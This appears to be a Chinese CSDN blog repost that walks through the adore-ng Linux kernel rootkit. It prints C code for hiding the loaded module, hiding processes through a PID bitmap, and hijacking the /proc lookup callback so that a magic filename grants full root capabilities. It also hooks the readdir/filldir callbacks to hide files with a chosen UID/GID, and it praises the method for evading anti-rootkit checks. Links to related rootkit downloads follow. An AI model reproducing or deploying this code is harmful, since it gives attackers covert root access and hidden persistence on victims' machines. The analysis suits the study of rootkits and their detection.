两个linux内核rootkit--之二:adore-ng

最新推荐文章于 2021-05-13 15:45:36 发布
最新推荐文章于 2021-05-13 15:45:36 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: linux内核开发相关 文章标签: linux内核 struct module 汇编 fp null

转自:http://blog.csdn.net/dog250/archive/2010/02/09/5303688.aspx

 

这个rootkit使用的技术不比前一个,它不是拦截系统调用,而是拦截具体文件系统的回调函数,本身文件系统的回调函数就是动态注册的,很是不确定,那么反黑软件自然就不能简单下结论说这个函数被黑掉了,因此这个rootkit看来比前一个略胜一筹,自然的,既然是内核模块,那么模块隐藏也是一个重要的内容,以下是一个简单的模块隐藏代码,使用此代码的前提就是将此模块紧接着希望被隐藏的模块之后加载:

...//省略头文件

int init_module()

{

if (__this_module.next) //这个逻辑很简单,由于被隐藏的模块在这个模块之前加载,那么之需要更改该模块的next指针即可

__this_module.next = __this_module.next->next;

return 0;

}

...//省略

该rootkit的第一步就是用所有的进程构建一个位图hidden_procs,如果哪个进程需要隐藏,那么就将该进程的pid所在的位置置1,反之置0

inline void hide_proc(pid_t x)

{

if (x >= PID_MAX || x == 1)

return;

hidden_procs[x/8] |= 1<<(x%8);

}

inline void unhide_proc(pid_t x)

{

if (x >= PID_MAX)

return;

hidden_procs[x/8] &= ~(1<<(x%8));

}

以下这个函数实际上和本rootkit无关,仅仅是一个帮助函数,但是还是列出来了,该函数的意义在于将一个字符串转化为一个数字

int adore_atoi(const char *str)

{

int ret = 0, mul = 1;

const char *ptr;

for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++) ;

ptr--;

while (ptr >= str) {

if (*ptr < '0' || *ptr > '9')

break;

ret += (*ptr - '0') * mul;

mul *= 10;

ptr--;

}

return ret;

}

以下函数判断一个进程是否被隐藏,其实很简单,简单的说如果位图上该进程的pid对应的位置是1,那么就该隐藏,反之就不该被隐藏,另外还有一个策略,就是隐藏进程的子进程也应该被隐藏:

int should_be_hidden(pid_t pid)

{

struct task_struct *p = NULL;

if (is_invisible(pid)) {

return 1;

}

p = adore_find_task(pid);

if (!p)

return 0;

task_lock(p);

if (is_invisible(p->parent->pid)) {

task_unlock(p);

hide_proc(pid);

return 1;

}

task_unlock(p);

return 0;

}

查看进程的ps命令主要是遍历/proc文件系统的根目录,只要是数字的那么就被视为一个进程的pid,该rootkit隐藏进程的策略很简单,就是:

sprintf(buf, APREFIX"/hide-%d", pid);

close(open(buf, O_RDWR|O_CREAT, 0));

由于open系统调用最终肯定会调用lookup回调函数,那么就在该lookup中做文章,如果想隐藏pid为n的进程,我们先在/proc创建一个新的文件hide-n文件,由于我们已经黑掉了具体proc文件系统的lookup回调函数为adore_lookup,所以我们可以将隐藏进程的操作放到该lookup中,在该lookup中如果发现有文件的前缀为hide-,那么我们就调用hide_proc函数,具体的pid就是该新建文件的第五个字符之后的字符串转化为数字。注意,这个adore_lookup函数一举两得,在新建带有hide-前缀文件的时候会隐藏文件,在ps命令查看进程的时候如果是已经隐藏的文件会返回NULL,这里有人可能会问,在/proc目录是没有权限创建新文件的,是的,是没有权限,关键是我们创建文件的目的不是创建一个新文件,而是仅仅希望使执行流到达lookup,从而调用hide_proc的目的,仅此而已:

struct dentry *adore_lookup(struct inode *i, struct dentry *d)

{

task_lock(current);

if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) {

current->flags |= PF_AUTH;

current->suid = ADORE_VERSION;

} else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "fullprivs", 9) == 0) {

...//所有id设置为0,代表root

cap_set_full(current->cap_effective);

cap_set_full(current->cap_inheritable);

cap_set_full(current->cap_permitted);

} else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "hide-", 5) == 0) { //想隐藏进程,只需在proc目录新建一个hide-(pid)即可

hide_proc(adore_atoi(d->d_iname+5));

} else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "unhide-", 7) == 0) {

unhide_proc(adore_atoi(d->d_iname+7));

} else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "uninstall", 9) == 0) {

cleanup_module();

}

task_unlock(current);

if (should_be_hidden(adore_atoi(d->d_iname)) && !should_be_hidden(current->pid))

return NULL;

return orig_proc_lookup(i, d);

}

到此为止,进程已经隐藏了,那么端口怎么隐藏呢?很简单,同样的办法,拦截/proc文件系统就是了,最后文件怎么隐藏呢?如果想达到ls显示不出隐藏文件的目录,简单的办法就是黑掉文件系统的readdir回调函数:

int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)

{

int r = 0;

if (!fp || !fp->f_vfsmnt)

return 0;

root_filldir = filldir; //保存原先的filldir

root_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;

r = orig_root_readdir(fp, buf, adore_root_filldir);

return r;

}

int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)

{

struct inode *inode = NULL;

int r = 0;

uid_t uid;

gid_t gid;

if ((inode = iget(root_sb[current->pid % 1024], ino)) == NULL)

return 0;

uid = inode->i_uid;

gid = inode->i_gid;

iput(inode);

if (uid == ELITE_UID && gid == ELITE_GID) { //如果文件的uid和gid被设置成实现约定好的id,那么就说明该文件要隐藏了,想隐藏文件,只需要调用lchown将文件的uid和gid改变即可

r = 0; //碰到隐藏文件直接返回不再继续查找

} else

r = root_filldir(buf, name, nlen, off, ino, x); //如果不需要隐藏,那么调用原先的filldir

return r;

}

注意,本rootkit并没有拦截掉getdents64和getdents系统调用本身,而是直接拦截getdentsXX调用的file_operations中的readdir回调函数,这种方式很灵活而又不容易被发现,毕竟反黑程序可以监视系统调用的地址却不能简单的监视回调函数的地址,因为重要我注册一个新的文件系统,那么就会有一个新的地址,如果反黑程序那么负责总有一天会累死的,随着文件系统的增多,反黑程序会带跨整个系统的。

到此为止,该rootkit的大致框架已经搭建完毕,和上一个rootkit想必,该rootkit更隐蔽,没有使用很容易出错的并且和机器相关的汇编代码,仅仅使用标准c语言的指针操作即可,很直观,彻底告别了汇编,之需要你对内核文件系统的流程有一个简单的了解就可以完成,很不错。

 

cnctloveyu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 内核rootkit adore-ng-0.56
02-17
linux 内核rootkit adore-ng-0.56 完全解析 想对linux下的rootkit有个全面的了解 这是一个很好的例子。
linux后门系列之adore-ng
05-29 1811
前言:kernel 2.6已经大步走入linux的世界,写后门的和用后门的也得跟上潮流。简写约定:fc:fedora corerh:red hatrhel4:red hat enterprise linux 4sk:suckitadore:adore-ngrk:rootkitlkm:loadable kernel modules什么是adore-ng?一个LKM rk,google ado
Rootkitadore-ng 模拟木马病毒
02-13 1578
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 在我们生活中,经常看的电视剧谍战片里有一个必不可少的人物——卧底。它的职责就是:良好的伪装使得对手对此长时间毫无察觉;他赢得敌人的信任并因此身居要职,这使得他能够源源不断地获取重要情报并利用其独特渠道传送回去。 而我们今天要模...
linux后门漏洞大全,Linux后门系列之adore-ng
weixin_29790175的博客
05-13 344
久之前写的一个文章,自己转回来。奇了怪了,当时我测试是可以隐藏端口的,但我现在折腾又隐藏不了端口,答案很快就会出来:)找到原因了,东西还是原汁原味的好,遇到类似问题的请用原版,想知道问题出在哪的请自行diff。前言:kernel2.6已经大步走入linux的世界,写后门的和用后门的也得跟上潮流。简写约定:fc:fedoracorerh:redhatrhel4:redhatenterpr...
adore-ng linux rootkit
05-12
老牌linux rootkit工具 该版本能稳定运行在内核2.4-2.6中
rootkit-module-2.6.30:内核 2.6.30 的 Rootkit 和实用程序
06-27
rootkit-module-2.6.30 内核 2.6.30 的 Rootkit 和实用程序
awesome-linux-rootkits:令人敬畏的linux-rootkits
01-31
awesome-linux-rootkits:令人敬畏的linux-rootkits
lkm-rootkit:作为 linux 内核模块实现的 rootkit
06-08
lkm-rootkit 作为 linux 内核模块实现的 rootkit ##Syscall 表:###NOTICE:此内核模块仅与 64 位 PC 兼容。 如果您的 PC 是 32 位,请不要运行。加载“rootkit”模块: make -f Makefilesudo insmod rootkit....
RootKits-List-Download:这是到目前为止在github和其他站点上找到的所有rootkit的列表
05-29
https://citypw.blogspot.gr/2014/08/an-awesome-linux-kernel-rootkit-suterusu.html https://github.com/Cr4sh/WindowsRegistryRootkit ...
adore-ng-master.zip
02-13
Adore-ng 木马病毒所需软件包其中之一:adore-ng-master.zip,大胆放心使用,不需要积分,只求浏览博客时留下您的评论和点赞,谢谢!
Griffin-Hypervisor:使用Intel VT-x实现的Anti-Rootkit
03-18
Girffin系统管理程序使用Intel VT-x功能实现的Anti-Rootkit。 Griffin项目包含许多模块,其中之一就是Griffin Hypervisor。 Griffin Hypervisor是带有我们自定义安全模块的VT-x虚拟机管理程序,可在内核级别观察恶意...
linux-rootkits:我Linux 4.x内核rootkit的珍贵收藏
05-24
这个仓库重新整理了我Linux 4.x内核rootkit的珍贵收藏。 您会发现我编写的一些rootkit和我为最新版本Linux内核改编的其他可公开获得的rootkit。 这些rootkit绝不是真实的rootkit。 它们已被最小化,仅应用于教育...
Android-Rootkit:适用于 Android 的 rootkit。 基于 Phrack Issue 68 的“Android platform based linux kernel rootkit
05-30
Android-Rootkit 适用于 Android 的 rootkit。 基于来自Phrack Issue 68 类项目的一部分。 在这里添加它只是因为没有足够的文档来为 Android 执行此操作 我感谢任何拉取请求,只要它们扩展功能并且不造成伤害 内核...
Hijack linux system calls rootkit:劫持 linux 系统调用-开源
07-17
劫持linux系统调用,例如调用open系统调用时,会调用新的被劫持的系统调用,而不是原来的系统调用。 请参阅:http://se7so.blogspot.com/2012/07/hijacking-linux-system-calls-rootkit.html
linux后门adore-ng
weixin_34060299的博客
10-03 108
linux后门adore-ng 也可以从这里下载 http://stealth.openwall.net/rootkits/ 转载于:https://blog.51cto.com/ach4ng/1011769
Linux Kernels 2.6.x / 3.x / 4.x / 5.x中运行的LKM rootkit-C/C++开发
05-27
Brokepkg是Linux Kernels 2.6.x / 3.x / 4.x / 5.x和ARM64的LKM rootkit,在内核5.7之后支持,没有kallsyms_lookup_name。 BrokePkg Brokepkg是Linux Kernels 2.6.x / 3.x / 4.x / 5.x和ARM64的LKM rootkit,在内核...
Anti MBR-Rootkit技术研究
01-20
摘要:本文主要对磁盘主引导记录MBR和Windows操作系统的启动过程进行了阐述,对Rootkit和MBR-Rootkit技术特点进行了总结,对MBR-Rootkit结构和实例的行为特点进行了深入研究和剖析,针对WinXP操作系统的MBR-Rootkit...
cgaty:钩住GDT-安装呼叫门。 Rootkit Arsenal Book第二版的POC
05-22
Rootkit Arsenal第二版中的Bill D. Blunden撰写的《颂歌》中的章节: “当我从编写本书的第一版中恢复过来时,我收到了David Reguera Garcia(又名Dreg)的电子邮件,其中包含处理多个处理器的代码。他在第二版中...
linux rootkit
最新发布
03-16
Linux rootkit是一种恶意软件,它可以隐藏在操作系统内核中,以避免被检测和删除。它可以允许攻击者远程控制受感染的计算机,窃取敏感信息,修改文件和系统设置,甚至可以使系统崩溃。为了保护计算机安全,用户应该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值